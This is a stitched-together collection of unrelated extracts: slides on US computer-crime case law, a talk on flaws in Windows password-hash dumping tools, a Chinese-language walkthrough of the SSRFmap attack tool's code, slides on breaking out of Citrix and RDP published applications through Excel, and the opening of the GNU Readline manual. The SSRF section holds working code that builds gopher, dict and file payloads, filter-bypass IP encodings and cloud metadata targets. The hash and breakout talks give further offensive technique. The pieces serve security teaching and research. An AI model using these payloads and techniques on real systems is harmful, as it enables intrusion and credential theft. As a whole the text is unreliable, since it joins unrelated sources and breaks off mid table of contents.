Commission struck the controversial language from the amendments
Justice Department supported the proposed amendment as a way to
hand down stiffer sentences for people who set up elaborate proxy
networks--sometimes in multiple countries --to commit crimes and
hide their identities.
Digital-rights advocates said the amendment would have sent a
chilling message about using a common technology that is often
encouraged as a safer way of using the Internet.
Fortunately US Sentencing Commission will
not recognizes your special skills
Agenda
Encrypted Hard Drive
Scope of Consent & Investigation
Untimely Search after Seizure
Consent/Destruction of Evidence/Revoke consent to
search computer
Border Search of PC Away from Border
FTC and Cyberspy Software
Installing viruses and key stroke logger
Responsible Disclosure
Cyberwarfare and Definitions
What Makes a Hacker – 2 operating systems
Spoliation of evidence can equal losing case
Anonymity
Swinging scale of CFAA
Possession of malware/Reverse engineering
Disclaimer
aka The fine Print
JER 3-307.
Teaching, Speaking and Writing
a.
Disclaimer for Speeches and Writings Devoted to Agency Matters. A DoD employee who uses or
permits the use of his military grade or who includes or permits the inclusion of his title or position as
one of several biographical details given to identify himself in connection with teaching, speaking or
writing, in accordance with 5 C.F.R. 2635.807(b)(1) (reference (h)) in subsection 2-100 of this Regulation,
shall make a disclaimer if the subject of the teaching, speaking or writing deals in significant part with
any ongoing or announced policy, program or operation of the DoD employee's Agency, as defined in
subsection 2-201 of this Regulation, and the DoD employee has not been authorized by appropriate
Agency authority to present that material as the Agency's position.
(1)
The required disclaimer shall expressly state that the views presented are those of the speaker or
author and do not necessarily represent the views of DoD or its Components.
(2)
Where a disclaimer is required for an article, book or other writing, the disclaimer shall be printed
in a reasonably prominent position in the writing itself. Where a disclaimer is required for a speech or
other oral presentation, the disclaimer may be given orally provided it is given at the beginning of the oral
presentation.
My Background
Army CERT
Navy CIO
US-CERT
In re: Grand Jury Subpoena to Sebastien Boucher,
2009 U.S. Dist. LEXIS 13006 (DC Ver. Feb. 19,
2009)
Gov’t appeal US Magistrate Judge’s Opinion and Order
granting Defendant’s motion to quash grand jury
subpoena that it violates his Fifth Amendment right.
Gov’t doesn’t want password for encrypted HD wants only
to have defendant provide an unencrypted version of the
HD to grand jury.
Court –Boucher must provide an unencrypted version of
HD to grand jury.
Acts of producing incriminating 2 situations – 1 existence
and location unknown to Gov’t; 2 production implicitly
authenticates.
Gov’t knows incriminating files on encrypted drive Z: and
will not use this as “authentication” will link files to
Defendant in other way
United States v. Richardson, 2008 U.S. Dist LEXIS 88242
(W.D. Penn. Oct 31, 2008)
United States v. Parson, 2009 U.S. Dist. LEXIS 15125 (W.D.
Penn. Feb. 25, 2009)
ICE Agents
Investigating Child Porn
Knock and Talk
Victim of identity theft
Can we search your computer for evidence of
identity theft
Scope of consent
ICE Knock & Talk - Child porn investigation
Defendant admits computer contains child porn but does not
give consent to search
ICE agents open up computer and seize HD.
Sits unsearched for 3 weeks until lead agent applied for and
gets warrant to search it
Agent out of office for 2 weeks on training, not in hurry
Conviction vacated, evidence suppressed, initial seizure
justified, delay in obtaining search authorization not within a
reasonable period of time
United States v. Mitchell, 2009 U.S. App. LEXIS 8258
(11th Cir. Ga. Apr. 22, 2009)
United States v. Knighton, Sr., 2009 U.S. App.
LEXIS 1360 (3rd Cir. NJ Jan. 23, 2009)
2 Level Sentence Enhancement for obstruction of
investigation.
2 FBI agents Philadelphia field office
Defendant’s residence, inform suspect child porn
Defendant admits, consents to search, shows agents to
2nd floor and computer, leave to 1st floor
Return to computer, monitor message “Washing
cache/cookies”
Defendant reveals turning on computer activates an
automatic software program that deletes temporary
cached Internet files and cookies, unless manually
bypassed.
United States v. Megahed, 2009 WL 722481 (M.D.
Fla. March 18, 2009)
Suspect not home FBI ask father for consent to search, FBI
takes computer away August 6, 2007
2 months later father w/d consent, unclear when image made
Computer not searched until a year later (apparently) key
evidence discovered October 2008
Motion to suppress evidence discovered – internet history file.
After agents searched, seized computer, captured mirror image
copy, and returned HD to defendant, evidence was discovered in
course of examine of mirror image copy.
In October 2008 neither defendant or his father retained a
reasonable expectation of privacy in the mirror image copy.
Valid consent to search carries the right to examine and
photocopy.
See US v Ponder, 444 F. 2d 816, 818 (5th Cir. 1971): Mason v
Pulliam, 557 F. 2d 426, 429 (5th Cir. 1977)(IRS document case).
United States v. Cotterman, 2009 U.S. Dist. LEXIS
14300 (DC Ariz. Feb. 23, 2009)
Search only justified as a border search because no p/c at all to allow the
search of the computer.
Decision to search based upon a TECS hit out of California based upon the
fact Defendant had a 15 year old child molestation conviction.
Search could have been done, (while not necessarily to the convenience of
the agents) at border, technician could have traveled from Tucson to do the
analysis.
Defendant and wife waited more than 8 hours at the border finally told
computer going to be taken to Tucson even though he offered to help
access the computer at the border. This offer was declined by the agents.
Search took at least 48 hours to yield results.
Cannot be said that Tucson became functional equivalent of border.
Because Tucson not functional equivalent of border (170 miles away)
Court agrees with the MJ evidence should be suppressed.
RemoteSpy
Legitimate Use
Substantial harm to consumers
TRO enjoining sale
FTC v. Cyberspy Software, LLC, 2009 U.S. Dist
LEXIS 13494 (M.D. Fla. Feb. 23, 2009)
Installed virus on office and personal computer to steal
passwords
Defendant motion to dismiss –
sending virus to detect and steal passwords located on a
computer does not constitute an attempt to intercept and
electronic communication for purposes of federal Wiretap act.
SCA does not apply
CFAA inapplicable – no harm plead
Court held – Wiretap Act claim dismissed
SCA claim unclear at this time whether Trojan program
accessed information stored on device
CFAA survives, harm sufficiently plead
Becker, et al. v. Toca, 2008 U.S. Dist. LEXIS 89123
(E.D. La. Sept 26, 2008)
Key logger installed on computer shared by defendant and his
ex-wife
Wiretap Act Claim
No interception –
definition of "intercept" "encompasses only acquisitions contemporaneous with transmission."
United States v. Steiger, 318 F.3d 1039, 1047 (11th Cir. 2003). See Steve Jackson Games, Inc. v.
United States Secret Service, 36 F.3d 457 (5th Cir. 1994); Konop v. Hawaiian Airlines, Inc., 302
F.3d 868 (9th Cir. 2001); In re Pharmatrak, Inc., 329 F.3d 9 (1st Cir. 2003); and Fraser v.
Nationwide Mutual Ins. Co., 352 F.3d 107 (3rd Cir. 2003).
SCA Claim
This court agrees with the reasoning in Theofel. The fact that Plaintiff may have already read the
emails and messages copied by Defendant does not take them out of the purview of the Stored
Communications Act. The plain language of the statute seems to include emails received by the
intended recipient where they remain stored by an electronic communication service.
However, as a point of clarification, Stored Communications Act protection does not extend to emails
and messages stored only on Plaintiff's personal computer. In re Doubleclick Inc., 154 F. Supp. 2d 497,
511 (S.D.N.Y. 2001)("the cookies' residence on plaintiffs' computers does not fall into § 2510(17)(B)
because plaintiffs are not 'electronic communication service' providers."). Defendant does not set
forth any other basis for dismissing the claim. Accordingly, Defendant Bailey is not entitled to
summary judgment on Plaintiff's [*18] claim for violation of 18 U.S.C. § 2701.
Bailey v. Bailey, 2008 U.S. Dist. LEXIS 8565 (E.D.
Mich. Feb. 6, 2008)
For the enterprise network manager, the notion of
responsible disclosure has centered on the idea that major
security flaws in products they use wouldn’t be shared
publicly in any way until a software vendor corrected them.
That's the underlying premise of what’s called the
Organization for Internet Safety (OIS) guidelines first
released five years ago and updated in 2004. An effort
spearheaded by Microsoft, the OIS guidelines now face
criticism from some of the very people who wrote them,
who argue enterprises should know about serious flaws
early for purposes of security workarounds.
Ellen Messmer, Network World 5/31/2007
Responsible Disclosure
First Rule as Attorney – Never get near a
Courtroom Especially in Criminal proceedings
Recent Examples & Discussion
Responsible Disclosure
Cyber Warfare & Definitions
Computer Network Security
Multiple disciplines
Network Ops-
CERTs/NOSCs
Intelligence
Counterintelligence
Law enforcement
Commander-in-Chief
Event Will Determine Response and Legal
Authority
Computer Security
Events
Incidents
Intrusions
Attacks
Calixte
College roommate domestic disturbance
Roommate informs cops Calixte CS major
Saw Hack into BC grading system
200+ illegally downloaded movies
Seized – 3 laptops; 2 iPods; 2 cell phones; digital
camera; numerous hard drives, flash drives, and
compact disks.
Commonwealth has begun to examine items seized but
unable to access data on HD of Calixte’s laptop
Motion quash search warrant; return property;
suppress any evidence from search in Newton District
Court – Judge p/c exists, appeal
Calixte
Gutman v Klein, 2008 U.S. dist LEXIS 92398 (E.D.
N.Y. Oct. 15 2008) (Civil Litigation Case)
Spoliation of Evidence, deletion Defendant's laptop
MJ ordered defendant to make available HDs, suspected
tampering, MJ court appointed forensic expert examination
“indicative of behavior of a user who was attempting to
permanently delete selective files from the machine and
then cover up the chronology of system changes occurring
in the hours and days just prior to a forensic preservation."
Litigation started 5 years earlier, duty to preserve,
Defendant’s explanation contradictory and incredible.
MJ what to do in response to spoliation – DJ
When a trial court is confronted with a defamation action in which
anonymous speakers or pseudonyms are involved, it should
1 require plaintiff to undertake efforts to notify anonymous posters they
are subject of a subpoena or application for an order of disclosure,
including posting a message of notification of the identity discovery
request on the message board;
2 withhold action to afford the anonymous posters reasonable
opportunity to file and serve opposition to the application;
3 require plaintiff to identify and set forth exact statements purportedly
made by each anonymous poster, alleged to constitute actionable
speech;
4 determine whether complaint has set forth a prima facie defamation
per se or per quod action against the anonymous posters; and
5 if all else is satisfied, balance anonymous poster's First Amendment
right against strength of the prima facie case of defamation presented by
plaintiff and necessity for disclosure of anonymous defendant's identity,
prior to ordering disclosure.
Independent Newspaper, Inc. v. Brodie, 2009 Md.
LEXIS (Ct. of Apps. Md. Feb 27, 2009)
Kluber Skahan & Associates, Inc. v. Cordogan, Clark &
Assoc., Inc., 2009 U.S. Dist. LEXIS 14527 (N.D. Ill.
February 25, 2009)
Motorola, Inc., v. Lemko Corp., 2009 U.S. Dist. LEXIS 10668
(N.D. Ill. February 11, 2009)
Lasco Foods, Inc., v. Hall and Shaw Sales, 2009 U.S. Dist.
LEXIS 4241 (E.D. Miss. January 22, 2009)
Condux International, Inc., v. Haugum, 2008 U.S. Dist
LEXIS 1000949 (D.Ct. Minn. December 15, 2008)
Computer Fraud and Abuse (CFAA)
Cases
Council of Europe’s Convention on Cybercrime
Federal U.S. law
State law
Possession of Burglary tools???
Possession of Malware
DMCA
Supreme Court - Bonito Boats v. Thunder Craft Boats
Sega Enterprise v. Accolade
Atari v. Nintendo
Sony v. Connectix Corp
Reverse Engineering
Contact Information
[email protected] | pdf |
Click to edit Master subtitle style
Stamp Out Hash Corruption,
Crack All the Things!
Ryan Reynolds
Manager, Crowe Horwath
Pentester
Twitter: @reynoldsrb
Jonathan Claudius
SpiderLabs Security Researcher, Trustwave
Vulnerability Research
Twitter: @claudijd
What’s inside?
Windows Hash Extraction
Story of What We Found
Windows Hash Extraction Mechanics
A Different Approach
Why Are All the Tools Broken?
Demo
Patches
Click to edit Master subtitle style
Let’s talk about
hashes!!!
Goals of Getting Hashes
Privilege Escalation
Password Analysis
Forensics Investigations
Windows Password Hashes
Two Types of Hashes:
LM (Lan Manager)
▪ Old Hashing Algorithm w/ Security Flaws
▪ Case insensitivity, Broken into 2 Components
NTLM (NT Lan Manager)
▪ Newer Hashing Algorithm w/ Security Flaws
▪ Not salted, but is case sensitive
Windows Password Hashes
Two Methods to Get Hashes:
Injection via LSASS
▪ Reads hashes from memory
Registry Reading via SAM/SYSTEM
▪ Reads hashes from local registry hives
Click to edit Master subtitle style
Story Time…
Failed Attempt 1
Social Engineering Engagement
Gained Physical Access
Dumped Hashes on a Bank Workstation
Failed to Crack
John the Ripper
Rainbow Tables
Failed Attempt 2
Internal Penetration Assessment
Popped a Shell via Missing Patch
Dumped Hashes on System
Fail to Crack
Rainbow Tables (via all LM Space & French)
Pass the Hash (PTH)
Example Hashes
Via Registry (Metasploit)
LM: 4500a2115ce8e23a99303f760ba6cc96
NTLM: 5c0bd165cea577e98fa92308f996cf45
Via Injection (PwDump6)
LM: aad3b435b51404eeaad3b435b51404ee
NTLM: 5f1bec25dd42d41183d0f450bf9b1d6b
Bug Report
“Our Powers Combined…”
Beers
Hacking
More Beers
Click to edit Master subtitle style
Where Do Hashes
Live?
Where Do Hashes Live?
HKLM\SAM
Store security information for each user (including
hash data)
HKLM\SYSTEM
Stores the SYSKEY (“salts” the SAM information
for security purposes)
What The Registry Looks Like
HKLM\SAM\SAM\domains\account\users\
Users: 000001F4, ..1F5, etc.
What’s Inside These Values?
For each user, we have two values…
“F” – Binary Data
▪ Last Logon, Account Expires, Password Expiry, etc.
“V”- Binary Data
▪ Username, LM Hash Data, NT Hash Data, etc.
A Closer Look At Raw Data
Raw Data w/ LM & NTLM Data
...0000AAAAAAAA0000BBBBBBBB00000...
Raw Data w/ just NTLM Hash Data
...00000000BBBBBBBB0000000000000...
Registry Extraction Tools
Metasploit Hashdump Script
Creddump
Samdump2
Cain and Able
Pwdump7
FGDump 3.0
Others
Current Parsing Logic
LM & NTLM
NTLM
None
OFFSET
Else If size > 20 bytes?
Else
HASH DATA
If size > 40 bytes?
Click to edit Master subtitle style
The “Flaw”
Remember these?
Via Registry (Metasploit)
LM: 4500a2115ce8e23a99303f760ba6cc96
NTLM: 5c0bd165cea577e98fa92308f996cf45
Via Injection (PwDump6)
LM: aad3b435b51404eeaad3b435b51404ee
NTLM: 5f1bec25dd42d41183d0f450bf9b1d6b
The “Flaw”
LM & NTLM
NTLM
None
OFFSET
HASH DATA
If size > 40 bytes?
Else
DATA++
Else If size > 20 bytes?
The “Flaw”
BAD
...0000AAAAAAAA0000BBBBBBBB00000...
...00000000BBBBBBBB0000000000000...
Root Cause?
How do we get “DATA++”?
By following Microsoft best practices
Set Password History
No LM Hashes
OFFSET
HASH DATA
DATA++
Raw Look at “V” Data Structure
DATA++
LM HASH
DATA
NT HASH DATA
How often does this occur?
Newer OS’s do not store LM
Windows Vista and newer
LM can be disabled by a proactive Sysadmin
Password histories set through GPO
In an ideal world…
We would want…
LM Exists?
NTLM Exists?
Parse correct hash data 100% of the time
Raw Look at “V” Data Structure
<insert slide here with the raw registry
details>
LM
HEADER
NT
HEADER
DATA++
LM HASH
DATA
NT HASH DATA
A Different Approach
“V” hash 4 byte headers for LM & NTLN
0x4 (4 bytes) = Hash Not Present (false)
0x14 (20 bytes) = Hash Present (true)
No more guessing!
A Different Approach
LM & NTLM
NTLM
None
OFFSET
HASH DATA
If LM.exists? && NTLM.exists?
Else If NTLM.exists?
Else
DATA++
A Different Approach
BAD LOGIC
...0000AAAAAAAA0000BBBBBBBB00000...
...00000000BBBBBBBB0000000000000...
GOOD LOGIC
...0000AAAAAAAA0000BBBBBBBB00000...
...00000000BBBBBBBB0000000000000...
Click to edit Master subtitle style
Why are all the
tools broken?
Who’s Patient Zero?
pwdump
Cain & Able
Creddump
Metasploit
Pwdump7
Fgdump 3.0
samdump2
Tool Timeline
Samdump2
v. 1.0.1
3/28/04
Cain & Abel
v. 2.7.4
7/9/05
Creddump
v. 0.1
2/20/08
MSF
Hashdump
12/30/09
FGDump
v. 3.0
11/9/11
Pwdump7
v. 7.1
3/10/10
Samdump2
v. 1.1.1
11/21/07
Pwdump v. 1
3/24/1997
Take Away
Reverse engineering is hard
Exhaustive testing is time consuming
Leveraging code is helpful
Fully reusing code is not always good
Open source let’s others learn and help fix!
Click to edit Master subtitle style
Demonstration
Click to edit Master subtitle style
Patches!!!!
Patches
Affected Tools
Patched?
Creddump
Yes
Metasploit’s Hashdump Script
Yes
L0phtcrack
Working with Author(s)
Pwdump7
Working with Author(s)
FGDump 3.0
Working with Author(s)
Samdump2
Fixed in v 1.1.1
Cain & Abel
Working with Author(s)
Click to edit Master subtitle style
Questions? | pdf |
ssrfmap包含了ssrf的⼤部分⽤法,于是看了下ssrfmap的代码和检测的⼿法,再结合⼀些ssrf的trick,想着能不能
弄个⾃动化检测ssrf+利⽤的⼯具。
SSRF基础知识
ssrf出现最根本的原因,就是服务端使⽤了⽹络函数,⽽⼀般编程语⾔⽹络函数底层调⽤的都是 curl (当然,这个
要看具体的函数代码以及底层逻辑),curl⼜⽀持很多协议,所以ssrf就可以使⽤这些协议。
curl 是⼀个开源的⽤于数据传输的命令⾏⼯具与库,它使⽤ URL 语法格式,⽀持众多传输协议,包括:
HTTP、HTTPS、FTP、FTPS、GOPHER、TFTP、SCP、SFTP、SMB、TELNET、DICT、LDAP、LDAPS、
FILE、IMAP、SMTP、POP3、RTSP和RTMP。
⼀般可以利⽤的协议有
file
unc
gopher
dict
http
https
php需要注意的是:
1. file_get_contents的gopher协议不能 UrlEncode
2. file_get_contents关于Gopher的302跳转有bug,导致利⽤失败
3. curl/libcurl 7.43上gopher协议存在bug(截断),7.45以上⽆此bug
4. curl_exec()默认不跟踪跳转
5. file_get_contents() ⽀持php://input协议
java⽀持 : http,https,file,ftp,mailto,jar,netdoc
Ssrfmap
ssrfmap的github是 https://github.com/swisskyrepo/SSRFmap
它的代码结构挺简单的
核⼼就是加载这个ssrf类,代码⽐较少,就直接贴出来好好学习⼀下
from core.requester import Requester
from core.handler import Handler
from importlib.machinery import SourceFileLoader
import os
import time
import logging
class SSRF(object):
modules = set()
handler = None
requester = None
def __init__(self, args):
# 加载内置模块,函数在下⾯
self.load_modules()
# 启动反连的shell
if args.handler and args.lport and args.handler == "1":
handler = Handler(args.lport)
handler.start()
elif args.handler and args.lport:
self.load_handler(args.handler)
handler = self.handler.exploit(args.lport)
handler.start()
self.requester = Requester(args.reqfile, args.useragent, args.ssl)
# NOTE: if args.param == None, target everything
if args.param == None:
logging.warning("No parameter (-p) defined, nothing will be tested!")
# NOTE: if args.modules == None, try everything
if args.modules == None:
logging.warning("No modules (-m) defined, everything will be tested!")
for module in self.modules:
module.exploit(self.requester, args)
else:
for modname in args.modules.split(','):
for module in self.modules:
if module.name == modname:
module.exploit(self.requester, args)
break
# Handling a shell
while args.handler:
handler.listen_command()
time.sleep(5)
def load_modules(self):
for index,name in enumerate(os.listdir("./modules")):
location = os.path.join("./modules", name)
if ".py" in location:
mymodule = SourceFileLoader(name, location).load_module()
self.modules.add(mymodule)
def load_handler(self, name):
handler_file = "{}.py".format(name)
try:
location = os.path.join("./handlers", handler_file)
self.handler = SourceFileLoader(handler_file, location).load_module()
⼀个python模块化编程的tips
name随便起⼀个名字,location为py⽂件地址,即可加载模块了。
模块
如果得到⼀个ssrf漏洞,你能⼲什么呢?我们可以攻击本地或者内⽹的各种服务,redis,mysql,扫描端⼝,内⽹
资产探测等等。
官⽅readme上写的模块有这些
except Exception as e:
logging.error("Invalid no such handler: {}".format(name))
exit(1)
from importlib.machinery import SourceFileLoader
mymodule = SourceFileLoader(name, location).load_module()
Name
Description
fastcgi
FastCGI RCE
redis
Redis RCE
github
Github Enterprise RCE < 2.8.7
zabbix
Zabbix RCE
mysql
MySQL Command execution
docker
Docker Infoleaks via API
smtp
SMTP send mail
portscan
Scan top 8000 ports for the host
networkscan
HTTP Ping sweep over the network
readfiles
Read files such as /etc/passwd
alibaba
Read files from the provider (e.g: meta-data, user-data)
aws
Read files from the provider (e.g: meta-data, user-data)
gce
Read files from the provider (e.g: meta-data, user-data)
digitalocean
Read files from the provider (e.g: meta-data, user-data)
socksproxy
SOCKS4 Proxy
smbhash
Force an SMB authentication via a UNC Path
tomcat
Bruteforce attack against Tomcat Manager
custom
Send custom data to a listening service, e.g: netcat
memcache
Store data inside the memcache instance
实际看它⽬录的话还远远不⽌。
其中有⼀些模块编写⽐较好的,例如alibaba,alibaba还有很多src都提供了ssrf探测的内⽹地址以及回显⽂件,⽤这
个专⻔批量去探测,就很棒。
allibaba模块的源码
self.endpoints.add( ("100.100.100.200","latest/meta-data/instance-id") )
self.endpoints.add( ("100.100.100.200","latest/meta-data/image-id") )
self.endpoints.add( ("100.100.100.200","latest/meta-data/") )
它会先请求⼀次,然后再带上payload再请求⼀次,取其中的差异⽂本。
取差异的函数简单粗暴(这个函数实际不太准确,参考的话需要改改)
在 core/utils.py ,有⼏个包装协议的函数也值得记录⼀下
def diff_text(text1, text2):
diff = ""
for line in text1.split("\n"):
if not line in text2:
diff += line + "\n"
return diff
def wrapper_file(data):
return "file://{}".format(data)
def wrapper_unc(data, ip):
同样的,⼀些常⽤的ip bypass⽅式也都被ssrf包装成了函数
ssrf ip转换的 bypass⽅式
default
default_shortcurt
ip_decimal_notation
...
URL解析绕过
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Par
ser-In-Trending-Programming-Languages.pdf
不仅仅是在ssrf中有利⽤,其危害范围很⼴,包括不限于url跳转,oauth认证,同源策略(如
postMessage中origin的判断)等⼀切会涉及到host判断的场景。
return "\\\\{}\\{}".format(ip, data)
def wrapper_gopher(data, ip, port):
return "gopher://{}:{}/_{}".format(ip, port, data)
def wrapper_dict(data, ip, port):
return "dict://{}:{}/{}".format(ip, port, data)
def wrapper_http(data, ip, port, usernm=False, passwd=False):
if usernm != False and passwd != False:
return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
return "http://{}:{}/{}".format(ip, port, data)
def wrapper_https(data, ip, port):
return "https://{}:{}/{}".format(ip, port, data)
def ip_default_local(ips, ip):
ips.add("127.0.0.1")
ips.add("0.0.0.0")
ips.add("localhost")
def ip_default_shortcurt(ips, ip):
ips.add("[::]")
ips.add("0000::1")
ips.add("0")
ips.add("127.1")
ips.add("127.0.1")
def ip_default_cidr(ips, ip):
ips.add("127.0.0.0")
ips.add("127.0.1.3")
ips.add("127.42.42.42")
ips.add("127.127.127.127")
def ip_decimal_notation(ips, ip):
try:
packedip = socket.inet_aton(ip)
ips.add(struct.unpack("!l", packedip)[0])
except:
pass
def ip_dotted_decimal_with_overflow(ips, ip):
try:
ips.add(".".join([str(int(part) + 256) for part in ip.split(".")]))
except:
pass
def ip_dotless_decimal(ips, ip):
def octet_to_decimal_part(ip_part, octet):
return int(ip_part) * (256 ** octet)
try:
parts = [part for part in ip.split(".")]
ips.add(str(octet_to_decimal_part(parts[0], 3) +
octet_to_decimal_part(parts[1], 2) + octet_to_decimal_part(parts[2], 1) +
octet_to_decimal_part(parts[3], 0)))
except:
pass
def ip_dotted_hexadecimal(ips, ip):
def octet_to_hex_part(number):
return str(hex(int(number)))
try:
ips.add(".".join([octet_to_hex_part(part) for part in ip.split(".")]))
except:
pass
def ip_dotted_octal(ips, ip):
def octet_to_oct_part(number):
return str(oct(int(number))).replace("o","")
try:
ips.add(".".join([octet_to_oct_part(part) for part in ip.split(".")]))
except:
pass
def ip_dotless_decimal_with_overflow(ips, ip):
def octet_to_decimal_part(ip_part, octet):
return int(ip_part) * (256 ** octet)
try:
parts = [part for part in ip.split(".")]
ips.add(str(octet_to_decimal_part(parts[0], 3) +
octet_to_decimal_part(parts[1], 2) + octet_to_decimal_part(parts[2], 1) +
octet_to_decimal_part(parts[3], 0)))
except:
pass
def ip_enclosed_alphanumeric(ips, ip):
intab = "1234567890abcdefghijklmnopqrstuvwxyz"
if ip == "127.0.0.1":
ips.add("ⓛⓞⒸⒶⓛⓣⒺⓢⓣ.ⓜⒺ")
outtab = "①②③④⑤⑥⑦⑧⑨⓪ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄ℗ⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ"
trantab = ip.maketrans(intab, outtab)
ips.add( ip.translate(trantab) )
outtab = "①②③④⑤⑥⑦⑧⑨⓪ⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ"
trantab = ip.maketrans(intab, outtab)
ips.add( ip.translate(trantab) )
def ip_dns_redirect(ips, ip):
if ip == "127.0.0.1":
ips.add("localtest.me")
ips.add("customer1.app.localhost.my.company.127.0.0.1.nip.io")
ips.add("localtest$google.me")
if ip == "169.254.169.254":
ips.add("metadata.nicob.net")
ips.add("169.254.169.254.xip.io")
ips.add("1ynrnhl.xip.io")
def gen_ip_list(ip, level):
ips = set()
if level == 1:
ips.add(ip)
if level == 2:
ip_default_local(ips, ip)
ip_default_shortcurt(ips, ip)
⾃动化思考
⾃动化分为⾃动化检测和⾃动化利⽤两个部分,⾃动化检测可以直接使⽤dnslog进⾏,dnslog确定回显后,在测
试dict、gopher、file等协议,这些协议都可以精⼼设置⼀个检测服务器来检测,检测服务器⽤来模拟各种协议,
file协议也可以通过⽹络位置访问。
if level == 3:
ip_dns_redirect(ips, ip)
ip_default_cidr(ips, ip)
if level == 4:
ip_decimal_notation(ips, ip)
ip_enclosed_alphanumeric(ips, ip)
if level == 5:
ip_dotted_decimal_with_overflow(ips, ip)
ip_dotless_decimal(ips, ip)
ip_dotless_decimal_with_overflow(ips, ip)
ip_dotted_hexadecimal(ips, ip)
ip_dotted_octal(ips, ip)
for ip in ips:
yield ip
基于此,就能知道⽬标⽀持的协议类型了。
知道了协议类型,是否回显,接下来就是⾃动化利⽤阶段了。
利⽤模块的编写
ssrfmap使⽤模块化的思想,每个可以ssrf利⽤的组件都作为了⼀个模块。但是它的模块编写⽐较简单,我觉得可
以升级⼀下,根据不同的协议,利⽤⽅式也不⼀样,在插件⾥可以指定⼀下这些参数
1. 指明组件
2. 指明可⽤协议
3. 指明是否回显
可以先把⼀些基础的ssrf 利⽤模块搞定
alibaba
aws
digitalocean
docker
fastcgi
gce
memcache
mysql
⽹段扫描/端⼝扫描
⽂件读取
redis
sendmail
socksproxy
zabbix
这些暂时只有⼀个想法,等把⼯具写出来再完善。
⾃建server验证服务器
⾃由设置30x跳转
探测回显为 python urllib,提示可以使⽤crlf cve
CVE-2019-9948,该漏洞只影响urllib,范围在Python 2.x到2.7.16,可使⽤local-file协议读取⽂件
dns rebinding
当然,上述情况是最理想的情况,在不同的语⾔,不同服务器中也存在差异
1. java中DNS请求成功的话默认缓存30s(字段为networkaddress.cache.ttl,默认情况下没有设
置),失败的默认缓存10s。(缓存时间在 /Library/Java/JavaVirtualMachines/jdk
/Contents/Home/jre/lib/security/java.security 中配置)
2. 在php中则默认没有缓存。
3. Linux默认不会进⾏DNS缓存,mac和windows会缓存(所以复现的时候不要在mac、
windows上尝试)
4. 有些公共DNS服务器,⽐如114.114.114.114还是会把记录进⾏缓存,但是8.8.8.8是严格按
照DNS协议去管理缓存的,如果设置TTL为0,则不会进⾏缓存。
When TLS Hacks You 攻击链⼯具
ftp被动模式
参考
https://security.tencent.com/index.php/blog/msg/179
如何⽤ FTP 被动模式打穿内⽹
https://www.anquanke.com/post/id/254387
Gopherus
https://github.com/tarunkant/Gopherus | pdf |
Bosses love Excel …
hackers too!
Juan Garrido “Silverhack”
Chema Alonso (@chemaalonso)
INFORMATICA64.COM
Who?
About
• Security Researchers
• Working at INFORMATICA64
• http://www.informatica64.com
What?
Terminal Applications
Why?
RDP
Citrix
Using Bing
Secure?
Verbosity
• Conf -files are too verbosity
–Internal IP Address
–Users & encrypted passwords
–Internal Software
–Perfect for APTs
• 0-day exploits
• Evilgrade attacks
Verbosity
Verbosity
• Attacker can:
–modify conf files
–Generate error messages
–Fingerprinting all software
• Example: C.A.C.A.
Computer Assited Citrix Apps
Hash Stealing
• Modify the Conf file
• Run a remote app in a rogue Server
• Sniff the hash
Playing the Piano
Playing the Piano
• Too many links
–Specially running on Windows 2008
• Too many environment variables
–%SystemRoot%
–%ProgramFiles%
–%SystemDrive%
Playing the Piano
• Too many shortcuts
– Ctrl + h – Web History
– Ctrl + n – New Web Browser
– Shift + Left Click – New Web Browser
– Ctrl + o – Internet Addres
– Ctrl + p – Print
– Right Click (Shift + F10)
– Save Image As
– View Source
– F1 – Jump to URL…
Playing the Piano
• Too , Too , Too many shorcuts:
–ALT GR+SUPR = CTRL + ALT + SUP
–CTRL + F1 = CTRL + ALT + SUP
–CTRL + F3 = TASK MANAGER
• Sticky Keys
Easy?
Paths?
Minimun Exposure Paths
• There are as many paths as
pulbished apps
• Every app is a path that could drive
to elevate privileges
• Complex tools are better candidates
• Excel is a complex tool
Excel as a Path
• Office Apps are complex
• Too many security policies
–Necesary to donwload extra GPOS
• Too many systems by default
–No Security GPOs
–Allowing non-signed Macros
–Allowing third-part-signed macros
–Allowing CA to be added
Excel 1
Software Restriction Policies
• Forbidden apps
–Via hash
–Via path
• App Locker
–Using Digital Certificates
• ACLs
Software Restriction Policies
• Too many consoles
–Cmd.exe
–Windows Management
Instrumentation
–PowerShell
• Even consoles from other OS
–ReactOS
Excel 2
Risky?
Start the III World War
• Find a bug in a DHS Computer
• Getting to the OS
• Sing an excel file with a rogue CA
• Generate an attacking URL in the
CRL to attack… China
• Send a digital signed-excel file…
Just
kidding
Contact information
• Juan Garrido “Silverhack”
–[email protected]
• Chema Alonso
–[email protected]
–@chemaalonso
• http://www.informatica64.com | pdf |
GNU Readline Library
Edition 6.1, for Readline Library Version 6.1.
October 2009
Chet Ramey, Case Western Reserve University
Brian Fox, Free Software Foundation
This manual describes the GNU Readline Library (version 6.1, 9 October 2009), a library
which aids in the consistency of user interface across discrete programs which provide a
command line interface.
Copyright c⃝ 1988–2009 Free Software Foundation, Inc.
Permission is granted to make and distribute verbatim copies of this manual provided the
copyright notice and this permission notice are preserved on all copies.
Permission is granted to copy, distribute and/or modify this document under
the terms of the GNU Free Documentation License, Version 1.3 or any later
version published by the Free Software Foundation; with no Invariant Sections,
with the Front-Cover texts being “A GNU Manual”, and with the Back-Cover
Texts as in (a) below. A copy of the license is included in the section entitled
“GNU Free Documentation License”.
(a) The FSF’s Back-Cover Text is: You are free to copy and modify this GNU
manual. Buying copies from GNU Press supports the FSF in developing GNU
and promoting software freedom.”
Published by the Free Software Foundation
59 Temple Place, Suite 330,
Boston, MA 02111-1307
USA
i
Table of Contents
1
Command Line Editing . . . . . . . . . . . . . . . . . . . . . . . . 1
1.1
Introduction to Line Editing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2
Readline Interaction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2.1
Readline Bare Essentials. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2.2
